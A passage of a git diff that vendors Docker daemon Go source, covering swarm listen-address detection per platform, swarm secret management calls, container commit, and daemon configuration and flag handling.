addresses + if !ok || !ipAddr.IP.IsGlobalUnicast() { + continue + } + + if ipAddr.IP.To4() != nil { + // IPv4 + + // Ignore addresses in subnets that are managed by Docker. + for _, subnet := range v4Subnets { + if subnet.Contains(ipAddr.IP) { + continue ifaceLoop + } + } + + if interfaceAddr4 != nil { + return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr4, ipAddr.IP) + } + + interfaceAddr4 = ipAddr.IP + } else { + // IPv6 + + // Ignore addresses in subnets that are managed by Docker. + for _, subnet := range v6Subnets { + if subnet.Contains(ipAddr.IP) { + continue ifaceLoop + } + } + + if interfaceAddr6 != nil { + return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr6, ipAddr.IP) + } + + interfaceAddr6 = ipAddr.IP + } + } + + // In the case that this interface has exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. + if interfaceAddr4 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr4) + } + systemAddr = interfaceAddr4 + systemInterface = intf.Name + } else if interfaceAddr6 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr6) + } + systemAddr = interfaceAddr6 + systemInterface = intf.Name + } + } + + if systemAddr == nil { + return nil, errNoIP + } + + return systemAddr, nil +} + +func listSystemIPs() []net.IP { + interfaces, err := net.Interfaces() + if err != nil { + return nil + } + + var systemAddrs []net.IP + + for _, intf := range interfaces { + addrs, err := intf.Addrs() + if err != nil { + continue + } + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + if ok { + systemAddrs = append(systemAddrs, ipAddr.IP) + } + } + } + + return systemAddrs +} + +func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error { + if interfaceA == interfaceB { + return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB) + } + return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go new file mode 100644 index 0000000000..3d4f239bda --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go @@ -0,0 +1,91 @@ +// +build linux + +package cluster + +import ( + "net" + + "github.com/vishvananda/netlink" +) + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + // Use the system's only device IP address, or fail if there are + // multiple addresses to choose from. + interfaces, err := netlink.LinkList() + if err != nil { + return nil, err + } + + var ( + systemAddr net.IP + systemInterface string + deviceFound bool + ) + + for _, intf := range interfaces { + // Skip non device or inactive interfaces + if intf.Type() != "device" || intf.Attrs().Flags&net.FlagUp == 0 { + continue + } + + addrs, err := netlink.AddrList(intf, netlink.FAMILY_ALL) + if err != nil { + continue + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr := addr.IPNet.IP + + // Skip loopback and link-local addresses + if !ipAddr.IsGlobalUnicast() { + continue + } + + // At least one non-loopback device is found and it is administratively up + deviceFound = true + + if ipAddr.To4() != nil { + if interfaceAddr4 != nil { + return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr4, ipAddr) + } + interfaceAddr4 = ipAddr + } else { + if interfaceAddr6 != nil { + return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr6, ipAddr) + } + interfaceAddr6 = ipAddr + } + } + + // In the case that this interface has exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. + if interfaceAddr4 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr4) + } + systemAddr = interfaceAddr4 + systemInterface = intf.Attrs().Name + } else if interfaceAddr6 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr6) + } + systemAddr = interfaceAddr6 + systemInterface = intf.Attrs().Name + } + } + + if systemAddr == nil { + if !deviceFound { + // If no non-loopback device type interface is found, + // fall back to the regular auto-detection mechanism. + // This is to cover the case where docker is running + // inside a container (eths are in fact veths). + return c.resolveSystemAddrViaSubnetCheck() + } + return nil, errNoIP + } + + return systemAddr, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go new file mode 100644 index 0000000000..4e845f5c8f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go @@ -0,0 +1,9 @@ +// +build !linux,!solaris + +package cluster + +import "net" + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + return c.resolveSystemAddrViaSubnetCheck() +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go new file mode 100644 index 0000000000..57a894b251 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go @@ -0,0 +1,57 @@ +package cluster + +import ( + "bufio" + "fmt" + "net" + "os/exec" + "strings" +) + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " + + "`/usr/sbin/route get default | /usr/bin/grep interface | " + + "/usr/bin/awk '{print $2}'`" + out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output() + if err != nil { + return nil, fmt.Errorf("cannot get default route: %v", err) + } + + defInterface := strings.SplitN(string(out), "/", 2) + defInterfaceIP := net.ParseIP(defInterface[0]) + + return defInterfaceIP, nil +} + +func listSystemIPs() []net.IP { + var systemAddrs []net.IP + cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr") + cmdReader, err := cmd.StdoutPipe() + if err != nil { + return nil + } + + if err := cmd.Start(); err != nil { + return nil + } + + scanner := bufio.NewScanner(cmdReader) + go func() { + for scanner.Scan() { + text := scanner.Text() + nameAddrPair := strings.SplitN(text, "/", 2) + // Let go of loopback interfaces and docker interfaces + systemAddrs = append(systemAddrs, net.ParseIP(nameAddrPair[0])) + } + }() + + if err := scanner.Err(); err != nil { + fmt.Printf("scan underwent err: %+v\n", err) + } + + if err := cmd.Wait(); err != nil { + fmt.Printf("run command wait: %+v\n", err) + } + + return systemAddrs +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go new file mode 100644 index 0000000000..f4c72ae13b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go @@ -0,0 +1,37 @@ +package provider + +import "github.com/docker/docker/api/types" + +// NetworkCreateRequest is a request when creating a network. +type NetworkCreateRequest struct { + ID string + types.NetworkCreateRequest +} + +// NetworkCreateResponse is a response when creating a network. +type NetworkCreateResponse struct { + ID string `json:"Id"` +} + +// VirtualAddress represents a virtual address. +type VirtualAddress struct { + IPv4 string + IPv6 string +} + +// PortConfig represents a port configuration. +type PortConfig struct { + Name string + Protocol int32 + TargetPort uint32 + PublishedPort uint32 +} + +// ServiceConfig represents a service configuration. +type ServiceConfig struct { + ID string + Name string + Aliases map[string][]string + VirtualAddresses map[string]*VirtualAddress + ExposedPorts []*PortConfig +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go new file mode 100644 index 0000000000..2b9eb5da1d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go @@ -0,0 +1,133 @@ +package cluster + +import ( + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetSecret returns a secret from a managed swarm cluster +func (c *Cluster) GetSecret(id string) (types.Secret, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Secret{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id}) + if err != nil { + return types.Secret{}, err + } + + return convert.SecretFromGRPC(r.Secret), nil +} + +// GetSecrets returns all secrets of a managed swarm cluster. +func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListSecretsFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.node.client.ListSecrets(ctx, + &swarmapi.ListSecretsRequest{Filters: filters}) + if err != nil { + return nil, err + } + + secrets := []types.Secret{} + + for _, secret := range r.Secrets { + secrets = append(secrets, convert.SecretFromGRPC(secret)) + } + + return secrets, nil +} + +// CreateSecret creates a new secret in a managed swarm cluster. +func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return "", c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + secretSpec := convert.SecretSpecToGRPC(s) + + r, err := c.node.client.CreateSecret(ctx, + &swarmapi.CreateSecretRequest{Spec: &secretSpec}) + if err != nil { + return "", err + } + + return r.Secret.ID, nil +} + +// RemoveSecret removes a secret from a managed swarm cluster. +func (c *Cluster) RemoveSecret(id string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + req := &swarmapi.RemoveSecretRequest{ + SecretID: id, + } + + if _, err := c.node.client.RemoveSecret(ctx, req); err != nil { + return err + } + return nil +} + +// UpdateSecret updates a secret in a managed swarm cluster. +// Note: this is not exposed to the CLI but is available from the API only +func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + secretSpec := convert.SecretSpecToGRPC(spec) + + if _, err := c.client.UpdateSecret(ctx, + &swarmapi.UpdateSecretRequest{ + SecretID: id, + SecretVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &secretSpec, + }); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go new file mode 100644 index 0000000000..1e7bffb1dc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/commit.go @@ -0,0 +1,271 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "io" + "runtime" + "strings" + "time" + + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/reference" +) + +// merge merges two Config, the image container configuration (defaults values), +// and the user container configuration, either passed by the API or generated +// by the cli. +// It will mutate the specified user configuration (userConf) with the image +// configuration where the user configuration is incomplete. +func merge(userConf, imageConf *containertypes.Config) error { + if userConf.User == "" { + userConf.User = imageConf.User + } + if len(userConf.ExposedPorts) == 0 { + userConf.ExposedPorts = imageConf.ExposedPorts + } else if imageConf.ExposedPorts != nil { + for port := range imageConf.ExposedPorts { + if _, exists := userConf.ExposedPorts[port]; !exists { + userConf.ExposedPorts[port] = struct{}{} + } + } + } + + if len(userConf.Env) == 0 { + userConf.Env = imageConf.Env + } else { + for _, imageEnv := range imageConf.Env { + found := false + imageEnvKey := strings.Split(imageEnv, "=")[0] + for _, userEnv := range userConf.Env { + userEnvKey := strings.Split(userEnv, "=")[0] + if runtime.GOOS == "windows" { + // Case insensitive environment variables on Windows + imageEnvKey = strings.ToUpper(imageEnvKey) + userEnvKey = strings.ToUpper(userEnvKey) + } + if imageEnvKey == userEnvKey { + found = true + break + } + } + if !found { + userConf.Env = append(userConf.Env, imageEnv) + } + } + } + + if userConf.Labels == nil { + userConf.Labels = map[string]string{} + } + for l, v := range imageConf.Labels { + if _, ok := userConf.Labels[l]; !ok { + userConf.Labels[l] = v + } + } + + if len(userConf.Entrypoint) == 0 { + if len(userConf.Cmd) == 0 { + userConf.Cmd = imageConf.Cmd + userConf.ArgsEscaped = imageConf.ArgsEscaped + } + + if userConf.Entrypoint == nil { + userConf.Entrypoint = imageConf.Entrypoint + } + } + if imageConf.Healthcheck != nil { + if userConf.Healthcheck == nil { + userConf.Healthcheck = imageConf.Healthcheck + } else { + if len(userConf.Healthcheck.Test) == 0 { + userConf.Healthcheck.Test = imageConf.Healthcheck.Test + } + if userConf.Healthcheck.Interval == 0 { + userConf.Healthcheck.Interval = imageConf.Healthcheck.Interval + } + if userConf.Healthcheck.Timeout == 0 { + userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout + } + if userConf.Healthcheck.Retries == 0 { + userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries + } + } + } + + if userConf.WorkingDir == "" { + userConf.WorkingDir = imageConf.WorkingDir + } + if len(userConf.Volumes) == 0 { + userConf.Volumes = imageConf.Volumes + } else { + for k, v := range imageConf.Volumes { + userConf.Volumes[k] = v + } + } + + if userConf.StopSignal == "" { + userConf.StopSignal = imageConf.StopSignal + } + return nil +} + +// Commit creates a new filesystem image from the current state of a container. +// The image can optionally be tagged into a repository. +func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return "", err + } + + // It is not possible to commit a running container on Windows and on Solaris. + if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() { + return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS) + } + + if c.Pause && !container.IsPaused() { + daemon.containerPause(container) + defer daemon.containerUnpause(container) + } + + newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes) + if err != nil { + return "", err + } + + if c.MergeConfigs { + if err := merge(newConfig, container.Config); err != nil { + return "", err + } + } + + rwTar, err := daemon.exportContainerRw(container) + if err != nil { + return "", err + } + defer func() { + if rwTar != nil { + rwTar.Close() + } + }() + + var history []image.History + rootFS := image.NewRootFS() + osVersion := "" + var osFeatures []string + + if container.ImageID != "" { + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return "", err + } + history = img.History + rootFS = img.RootFS + osVersion = img.OSVersion + osFeatures = img.OSFeatures + } + + l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID()) + if err != nil { + return "", err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + + h := image.History{ + Author: c.Author, + Created: time.Now().UTC(), + CreatedBy: strings.Join(container.Config.Cmd, " "), + Comment: c.Comment, + EmptyLayer: true, + } + + if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID { + h.EmptyLayer = false + rootFS.Append(diffID) + } + + history = append(history, h) + + config, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: newConfig, + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + Container: container.ID, + ContainerConfig: *container.Config, + Author: c.Author, + Created: h.Created, + }, + RootFS: rootFS, + History: history, + OSFeatures: osFeatures, + OSVersion: osVersion, + }) + + if err != nil { + return "", err + } + + id, err := daemon.imageStore.Create(config) + if err != nil { + return "", err + } + + if container.ImageID != "" { + if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil { + return "", err + } + } + + imageRef := "" + if c.Repo != "" { + newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer + if err != nil { + return "", err + } + if c.Tag != "" { + if newTag, err = reference.WithTag(newTag, c.Tag); err != nil { + return "", err + } + } + if err := daemon.TagImageWithReference(id, newTag); err != nil { + return "", err + } + imageRef = newTag.String() + } + + attributes := map[string]string{ + "comment": c.Comment, + "imageID": id.String(), + "imageRef": imageRef, + } + daemon.LogContainerEventWithAttributes(container, "commit", attributes) + containerActions.WithValues("commit").UpdateSince(start) + return id.String(), nil +} + +func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) { + if err := daemon.Mount(container); err != nil { + return nil, err + } + + archive, err := container.RWLayer.TarStream() + if err != nil { + daemon.Unmount(container) // logging is already handled in the `Unmount` function + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + archive.Close() + return container.RWLayer.Unmount() + }), + nil +} diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config.go new file mode 100644 index 0000000000..42ef18f74a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config.go @@ -0,0 +1,525 @@ +package daemon + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "runtime" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/discovery" + "github.com/docker/docker/registry" + "github.com/imdario/mergo" + "github.com/spf13/pflag" +) + +const ( + // defaultMaxConcurrentDownloads is the default value for + // maximum number of downloads that + // may take place at a time for each pull. + defaultMaxConcurrentDownloads = 3 + // defaultMaxConcurrentUploads is the default value for + // maximum number of uploads that + // may take place at a time for each push. + defaultMaxConcurrentUploads = 5 + // stockRuntimeName is the reserved name/alias used to represent the + // OCI runtime being shipped with the docker daemon package. + stockRuntimeName = "runc" +) + +const ( + defaultNetworkMtu = 1500 + disableNetworkBridge = "none" +) + +const ( + defaultShutdownTimeout = 15 +) + +// flatOptions contains configuration keys +// that MUST NOT be parsed as deep structures. +// Use this to differentiate these options +// with others like the ones in CommonTLSOptions. +var flatOptions = map[string]bool{ + "cluster-store-opts": true, + "log-opts": true, + "runtimes": true, + "default-ulimits": true, +} + +// LogConfig represents the default log configuration. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type LogConfig struct { + Type string `json:"log-driver,omitempty"` + Config map[string]string `json:"log-opts,omitempty"` +} + +// commonBridgeConfig stores all the platform-common bridge driver specific +// configuration. +type commonBridgeConfig struct { + Iface string `json:"bridge,omitempty"` + FixedCIDR string `json:"fixed-cidr,omitempty"` +} + +// CommonTLSOptions defines TLS configuration for the daemon server. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type CommonTLSOptions struct { + CAFile string `json:"tlscacert,omitempty"` + CertFile string `json:"tlscert,omitempty"` + KeyFile string `json:"tlskey,omitempty"` +} + +// CommonConfig defines the configuration of a docker daemon which is +// common across platforms. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type CommonConfig struct { + AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins + AutoRestart bool `json:"-"` + Context map[string][]string `json:"-"` + DisableBridge bool `json:"-"` + DNS []string `json:"dns,omitempty"` + DNSOptions []string `json:"dns-opts,omitempty"` + DNSSearch []string `json:"dns-search,omitempty"` + ExecOptions []string `json:"exec-opts,omitempty"` + GraphDriver string `json:"storage-driver,omitempty"` + GraphOptions []string `json:"storage-opts,omitempty"` + Labels []string `json:"labels,omitempty"` + Mtu int `json:"mtu,omitempty"` + Pidfile string `json:"pidfile,omitempty"` + RawLogs bool `json:"raw-logs,omitempty"` + Root string `json:"graph,omitempty"` + SocketGroup string `json:"group,omitempty"` + TrustKeyPath string `json:"-"` + CorsHeaders string `json:"api-cors-header,omitempty"` + EnableCors bool `json:"api-enable-cors,omitempty"` + + // LiveRestoreEnabled determines whether we should keep containers + // alive upon daemon shutdown/start + LiveRestoreEnabled bool `json:"live-restore,omitempty"` + + // ClusterStore is the storage backend used for the cluster information. It is used by both + // multihost networking (to store networks and endpoints information) and by the node discovery + // mechanism. + ClusterStore string `json:"cluster-store,omitempty"` + + // ClusterOpts is used to pass options to the discovery package for tuning libkv settings, such + // as TLS configuration settings. + ClusterOpts map[string]string `json:"cluster-store-opts,omitempty"` + + // ClusterAdvertise is the network endpoint that the Engine advertises for the purpose of node + // discovery. This should be a 'host:port' combination on which that daemon instance is + // reachable by other hosts. + ClusterAdvertise string `json:"cluster-advertise,omitempty"` + + // MaxConcurrentDownloads is the maximum number of downloads that + // may take place at a time for each pull. + MaxConcurrentDownloads *int `json:"max-concurrent-downloads,omitempty"` + + // MaxConcurrentUploads is the maximum number of uploads that + // may take place at a time for each push. + MaxConcurrentUploads *int `json:"max-concurrent-uploads,omitempty"` + + // ShutdownTimeout is the timeout value (in seconds) the daemon will wait for the container + // to stop when daemon is being shutdown + ShutdownTimeout int `json:"shutdown-timeout,omitempty"` + + Debug bool `json:"debug,omitempty"` + Hosts []string `json:"hosts,omitempty"` + LogLevel string `json:"log-level,omitempty"` + TLS bool `json:"tls,omitempty"` + TLSVerify bool `json:"tlsverify,omitempty"` + + // Embedded structs that allow config + // deserialization without the full struct. + CommonTLSOptions + + // SwarmDefaultAdvertiseAddr is the default host/IP or network interface + // to use if a wildcard address is specified in the ListenAddr value + // given to the /swarm/init endpoint and no advertise address is + // specified. + SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"` + MetricsAddress string `json:"metrics-addr"` + + LogConfig + bridgeConfig // bridgeConfig holds bridge network specific configuration. + registry.ServiceOptions + + reloadLock sync.Mutex + valuesSet map[string]interface{} + + Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not +} + +// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) { + var maxConcurrentDownloads, maxConcurrentUploads int + + config.ServiceOptions.InstallCliFlags(flags) + + flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options") + flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") + flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options") + flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") + flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime") + flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") + flags.MarkDeprecated("restart", "Please use a restart policy on docker run") + flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use") + flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU") + flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") + // FIXME: why the inconsistency between "hosts" and "sockets"? + flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") + flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use") + flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") + flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") + flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") + flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") + flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") + flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") + flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") + flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") + flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") + flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") + flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") + + flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") + flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features") + + flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") + + config.MaxConcurrentDownloads = &maxConcurrentDownloads + config.MaxConcurrentUploads = &maxConcurrentUploads +} + +// IsValueSet returns true if a configuration value +// was explicitly set in the configuration file. +func (config *Config) IsValueSet(name string) bool { + if config.valuesSet == nil { + return false + } + _, ok := config.valuesSet[name] + return ok +} + +// NewConfig returns a new fully initialized Config struct +func NewConfig() *Config { + config := Config{} + config.LogConfig.Config = make(map[string]string) + config.ClusterOpts = make(map[string]string) + + if runtime.GOOS != "linux" { + config.V2Only = true + } + return &config +} + +func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { + if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") { + return "", errors.New("Cluster Advertise Settings not supported on Solaris") + } + if clusterAdvertise == "" { + return "", errDiscoveryDisabled + } + if clusterStore == "" { + return "", fmt.Errorf("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration") + } + + advertise, err := discovery.ParseAdvertise(clusterAdvertise) + if err != nil { + return "", fmt.Errorf("discovery advertise parsing failed (%v)", err) + } + return advertise, nil +} + +// GetConflictFreeLabels validate Labels for conflict +// In swarm the duplicates for labels are removed +// so we only take same values here, no conflict values +// If the key-value is the same we will only take the last label +func GetConflictFreeLabels(labels []string) ([]string, error) { + labelMap := map[string]string{} + for _, label := range labels { + stringSlice := strings.SplitN(label, "=", 2) + if len(stringSlice) > 1 { + // If there is a conflict we will return an error + if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { + return nil, fmt.Errorf("conflict labels for %s=%s and %s=%s", stringSlice[0], stringSlice[1], stringSlice[0], v) + } + labelMap[stringSlice[0]] = stringSlice[1] + } + } + + newLabels := []string{} + for k, v := range labelMap { + newLabels = append(newLabels, fmt.Sprintf("%s=%s", k, v)) + } + return newLabels, nil +} + +// ReloadConfiguration reads the configuration in the host and reloads the daemon and server. +func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { + logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile) + newConfig, err := getConflictFreeConfiguration(configFile, flags) + if err != nil { + return err + } + + if err := ValidateConfiguration(newConfig); err != nil { + return fmt.Errorf("file configuration validation failed (%v)", err) + } + + // Labels of the docker engine used to allow multiple values associated with the same key. + // This is deprecated in 1.13, and, be removed after 3 release cycles. + // The following will check the conflict of labels, and report a warning for deprecation. + // + // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be + // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + // + // newLabels, err := GetConflictFreeLabels(newConfig.Labels) + // if err != nil { + // return err + // } + // newConfig.Labels = newLabels + // + if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil { + logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + } + + reload(newConfig) + return nil +} + +// boolValue is an interface that boolean value flags implement +// to tell the command line how to make -name equivalent to -name=true. +type boolValue interface { + IsBoolFlag() bool +} + +// MergeDaemonConfigurations reads a configuration file, +// loads the file configuration in an isolated structure, +// and merges the configuration provided from flags on top +// if there are no conflicts. +func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, configFile string) (*Config, error) { + fileConfig, err := getConflictFreeConfiguration(configFile, flags) + if err != nil { + return nil, err + } + + if err := ValidateConfiguration(fileConfig); err != nil { + return nil, fmt.Errorf("file configuration validation failed (%v)", err) + } + + // merge flags configuration on top of the file configuration + if err := mergo.Merge(fileConfig, flagsConfig); err != nil { + return nil, err + } + + // We need to validate again once both fileConfig and flagsConfig + // have been merged + if err := ValidateConfiguration(fileConfig); err != nil { + return nil, fmt.Errorf("file configuration validation failed (%v)", err) + } + + return fileConfig, nil +} + +// getConflictFreeConfiguration loads the configuration from a JSON file. +// It compares that configuration with the one provided by the flags, +// and returns an error if there are conflicts. +func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Config, error) { + b, err := ioutil.ReadFile(configFile) + if err != nil { + return nil, err + } + + var config Config + var reader io.Reader + if flags != nil { + var jsonConfig map[string]interface{} + reader = bytes.NewReader(b) + if err := json.NewDecoder(reader).Decode(&jsonConfig); err != nil { + return nil, err + } + + configSet := configValuesSet(jsonConfig) + + if err := findConfigurationConflicts(configSet, flags); err != nil { + return nil, err + } + + // Override flag values to make sure the values set in the config file with nullable values, like `false`, + // are not overridden by default truthy values from the flags that were not explicitly set. + // See https://github.com/docker/docker/issues/20289 for an example. + // + // TODO: Rewrite configuration logic to avoid same issue with other nullable values, like numbers. + namedOptions := make(map[string]interface{}) + for key, value := range configSet { + f := flags.Lookup(key) + if f == nil { // ignore named flags that don't match + namedOptions[key] = value + continue + } + + if _, ok := f.Value.(boolValue); ok { + f.Value.Set(fmt.Sprintf("%v", value)) + } + } + if len(namedOptions) > 0 { + // set also default for mergeVal flags that are boolValue at the same time. + flags.VisitAll(func(f *pflag.Flag) { + if opt, named := f.Value.(opts.NamedOption); named { + v, set := namedOptions[opt.Name()] + _, boolean := f.Value.(boolValue) + if set && boolean { + f.Value.Set(fmt.Sprintf("%v", v)) + } + } + }) + } + + config.valuesSet = configSet + } + + reader = bytes.NewReader(b) + err = json.NewDecoder(reader).Decode(&config) + return &config, err +} + +// configValuesSet returns the configuration values explicitly set in the file. +func configValuesSet(config map[string]interface{}) map[string]interface{} { + flatten := make(map[string]interface{}) + for k, v := range config { + if m, isMap := v.(map[string]interface{}); isMap && !flatOptions[k] { + for km, vm := range m { + flatten[km] = vm + } + 